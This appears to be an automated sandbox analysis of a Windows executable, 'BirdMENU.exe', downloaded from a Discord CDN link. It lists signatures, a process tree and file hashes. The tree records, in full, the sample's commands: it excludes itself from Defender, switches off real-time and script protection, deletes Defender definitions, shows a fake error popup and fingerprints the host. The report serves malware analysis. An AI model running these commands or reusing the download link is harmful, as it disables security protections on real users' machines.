Analysis

  • max time kernel
    70s
  • max time network
    66s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/11/2024, 13:54

General

  • Target

    https://cdn.discordapp.com/attachments/1304805438881140778/1304806116483399770/BirdMENU.exe?ex=6730bae4&is=672f6964&hm=06d680a9f82a97c40f023b335f5eeafd0ba20220b7bdde4a9349b6f5962e3cef&

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 64 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 38 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://cdn.discordapp.com/attachments/1304805438881140778/1304806116483399770/BirdMENU.exe?ex=6730bae4&is=672f6964&hm=06d680a9f82a97c40f023b335f5eeafd0ba20220b7bdde4a9349b6f5962e3cef&
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2500
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8b7e846f8,0x7ff8b7e84708,0x7ff8b7e84718
      2⤵
        PID:3168
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
        2⤵
          PID:4040
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3100
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:8
          2⤵
            PID:2044
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
            2⤵
              PID:2876
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
              2⤵
                PID:4028
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 /prefetch:8
                2⤵
                  PID:2292
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1780
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4676 /prefetch:8
                  2⤵
                    PID:3668
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
                    2⤵
                      PID:4424
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5956 /prefetch:8
                      2⤵
                        PID:3564
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6172 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5032
                      • C:\Users\Admin\Downloads\BirdMENU.exe
                        "C:\Users\Admin\Downloads\BirdMENU.exe"
                        2⤵
                        • Executes dropped EXE
                        PID:3192
                        • C:\Users\Admin\Downloads\BirdMENU.exe
                          "C:\Users\Admin\Downloads\BirdMENU.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:3576
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BirdMENU.exe'"
                            4⤵
                              PID:5368
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BirdMENU.exe'
                                5⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5788
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                              4⤵
                                PID:5376
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  5⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5796
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOT INSTALLED THIS CORRECT ASK FOR HELP', 0, 'ERROR', 32+16);close()""
                                4⤵
                                  PID:5388
                                  • C:\Windows\system32\mshta.exe
                                    mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOT INSTALLED THIS CORRECT ASK FOR HELP', 0, 'ERROR', 32+16);close()"
                                    5⤵
                                      PID:5804
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                    4⤵
                                      PID:5444
                                      • C:\Windows\system32\tasklist.exe
                                        tasklist /FO LIST
                                        5⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5716
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                      4⤵
                                        PID:5596
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic csproduct get uuid
                                          5⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5744
                                  • C:\Users\Admin\Downloads\BirdMENU.exe
                                    "C:\Users\Admin\Downloads\BirdMENU.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    PID:5296
                                    • C:\Users\Admin\Downloads\BirdMENU.exe
                                      "C:\Users\Admin\Downloads\BirdMENU.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:5496
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BirdMENU.exe'"
                                        4⤵
                                          PID:5216
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BirdMENU.exe'
                                            5⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5952
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                          4⤵
                                            PID:5228
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                              5⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5784
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOT INSTALLED THIS CORRECT ASK FOR HELP', 0, 'ERROR', 32+16);close()""
                                            4⤵
                                              PID:5268
                                              • C:\Windows\system32\mshta.exe
                                                mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOT INSTALLED THIS CORRECT ASK FOR HELP', 0, 'ERROR', 32+16);close()"
                                                5⤵
                                                  PID:5912
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                4⤵
                                                  PID:5324
                                                  • C:\Windows\system32\tasklist.exe
                                                    tasklist /FO LIST
                                                    5⤵
                                                    • Enumerates processes with tasklist
                                                    PID:5276
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                  4⤵
                                                    PID:5360
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic csproduct get uuid
                                                      5⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5832
                                              • C:\Users\Admin\Downloads\BirdMENU.exe
                                                "C:\Users\Admin\Downloads\BirdMENU.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:5196
                                                • C:\Users\Admin\Downloads\BirdMENU.exe
                                                  "C:\Users\Admin\Downloads\BirdMENU.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:4072
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BirdMENU.exe'"
                                                    4⤵
                                                      PID:6092
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BirdMENU.exe'
                                                        5⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:5664
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                      4⤵
                                                        PID:6100
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                          5⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:5816
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOT INSTALLED THIS CORRECT ASK FOR HELP', 0, 'ERROR', 32+16);close()""
                                                        4⤵
                                                          PID:6140
                                                          • C:\Windows\system32\mshta.exe
                                                            mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOT INSTALLED THIS CORRECT ASK FOR HELP', 0, 'ERROR', 32+16);close()"
                                                            5⤵
                                                              PID:5668
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                            4⤵
                                                              PID:5904
                                                              • C:\Windows\system32\tasklist.exe
                                                                tasklist /FO LIST
                                                                5⤵
                                                                • Enumerates processes with tasklist
                                                                PID:5364
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                              4⤵
                                                                PID:5620
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic csproduct get uuid
                                                                  5⤵
                                                                    PID:5508
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6116 /prefetch:1
                                                              2⤵
                                                                PID:5604
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
                                                                2⤵
                                                                  PID:5916
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:1
                                                                  2⤵
                                                                    PID:5208
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:1
                                                                    2⤵
                                                                      PID:5740
                                                                    • C:\Users\Admin\Downloads\BirdMENU.exe
                                                                      "C:\Users\Admin\Downloads\BirdMENU.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      PID:5300
                                                                      • C:\Users\Admin\Downloads\BirdMENU.exe
                                                                        "C:\Users\Admin\Downloads\BirdMENU.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:5348
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BirdMENU.exe'"
                                                                          4⤵
                                                                            PID:5816
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BirdMENU.exe'
                                                                              5⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:3612
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                            4⤵
                                                                              PID:1336
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                5⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:5380
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOT INSTALLED THIS CORRECT ASK FOR HELP', 0, 'ERROR', 32+16);close()""
                                                                              4⤵
                                                                                PID:6020
                                                                                • C:\Windows\system32\mshta.exe
                                                                                  mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOT INSTALLED THIS CORRECT ASK FOR HELP', 0, 'ERROR', 32+16);close()"
                                                                                  5⤵
                                                                                    PID:5660
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                  4⤵
                                                                                    PID:5136
                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                      tasklist /FO LIST
                                                                                      5⤵
                                                                                      • Enumerates processes with tasklist
                                                                                      PID:5944
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                    4⤵
                                                                                      PID:3680
                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                        wmic csproduct get uuid
                                                                                        5⤵
                                                                                          PID:668
                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                  1⤵
                                                                                    PID:2408
                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                    1⤵
                                                                                      PID:1812
                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                      1⤵
                                                                                        PID:5416
                                                                                      • C:\Users\Admin\Downloads\BirdMENU.exe
                                                                                        "C:\Users\Admin\Downloads\BirdMENU.exe"
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5684
                                                                                        • C:\Users\Admin\Downloads\BirdMENU.exe
                                                                                          "C:\Users\Admin\Downloads\BirdMENU.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6032
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BirdMENU.exe'"
                                                                                            3⤵
                                                                                              PID:4728
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BirdMENU.exe'
                                                                                                4⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:5764
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                              3⤵
                                                                                                PID:3540
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                  4⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:6004
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOT INSTALLED THIS CORRECT ASK FOR HELP', 0, 'ERROR', 32+16);close()""
                                                                                                3⤵
                                                                                                  PID:3776
                                                                                                  • C:\Windows\system32\mshta.exe
                                                                                                    mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOT INSTALLED THIS CORRECT ASK FOR HELP', 0, 'ERROR', 32+16);close()"
                                                                                                    4⤵
                                                                                                      PID:4580
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                    3⤵
                                                                                                      PID:2540
                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                        tasklist /FO LIST
                                                                                                        4⤵
                                                                                                        • Enumerates processes with tasklist
                                                                                                        PID:5692
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                      3⤵
                                                                                                        PID:6096
                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                          wmic csproduct get uuid
                                                                                                          4⤵
                                                                                                            PID:6064

                                                                                                    Network

                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                          Replay Monitor

                                                                                                          Loading Replay Monitor...

                                                                                                          Downloads

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                            Filesize

                                                                                                            152B

                                                                                                            MD5

                                                                                                            bffcefacce25cd03f3d5c9446ddb903d

                                                                                                            SHA1

                                                                                                            8923f84aa86db316d2f5c122fe3874bbe26f3bab

                                                                                                            SHA256

                                                                                                            23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405

                                                                                                            SHA512

                                                                                                            761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                            Filesize

                                                                                                            152B

                                                                                                            MD5

                                                                                                            d22073dea53e79d9b824f27ac5e9813e

                                                                                                            SHA1

                                                                                                            6d8a7281241248431a1571e6ddc55798b01fa961

                                                                                                            SHA256

                                                                                                            86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6

                                                                                                            SHA512

                                                                                                            97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                            Filesize

                                                                                                            186B

                                                                                                            MD5

                                                                                                            094ab275342c45551894b7940ae9ad0d

                                                                                                            SHA1

                                                                                                            2e7ce26fe2eb9be641ae929d0c9cc0dfa26c018e

                                                                                                            SHA256

                                                                                                            ef1739b833a1048ee1bd55dcbac5b1397396faca1ad771f4d6c2fe58899495a3

                                                                                                            SHA512

                                                                                                            19d0c688dc1121569247111e45de732b2ab86c71aecdde34b157cfd1b25c53473ed3ade49a97f8cb2ddc4711be78fa26c9330887094e031e9a71bb5c29080b0d

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                            Filesize

                                                                                                            5KB

                                                                                                            MD5

                                                                                                            3c55c87dcfb7a33acab90185625a8ee2

                                                                                                            SHA1

                                                                                                            049588c43ef9404da0d7c7a7caba585dd1359947

                                                                                                            SHA256

                                                                                                            33b8b4a578908883402966d40896a6418c27d01f2b55c3d91c8971415ab220fe

                                                                                                            SHA512

                                                                                                            e30d58ad982832d197d63156f3406cce5e19a4b93b4f02dcb6aeda3e2a920c6e17b39736c0d355617e79ca8b484867c954105d0837d6e2219f154ee8bc4c5e82

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                            Filesize

                                                                                                            6KB

                                                                                                            MD5

                                                                                                            7d49af88fe750b18f5b7d61060ff8fc1

                                                                                                            SHA1

                                                                                                            30e9e71606a618f8a0bbe0e491ed1370e8fc7084

                                                                                                            SHA256

                                                                                                            16ae1c6610b83c20f2f9be05b2b83691465736f07b6f0593ef129943fd197615

                                                                                                            SHA512

                                                                                                            45b80176d27b1fa5af402011c09009df75a9c57ec290d43aa9bd08bb8eef3432a10c7f9abb468831949a4058c32f8be9406355f4d46036f52798573ed23068cc
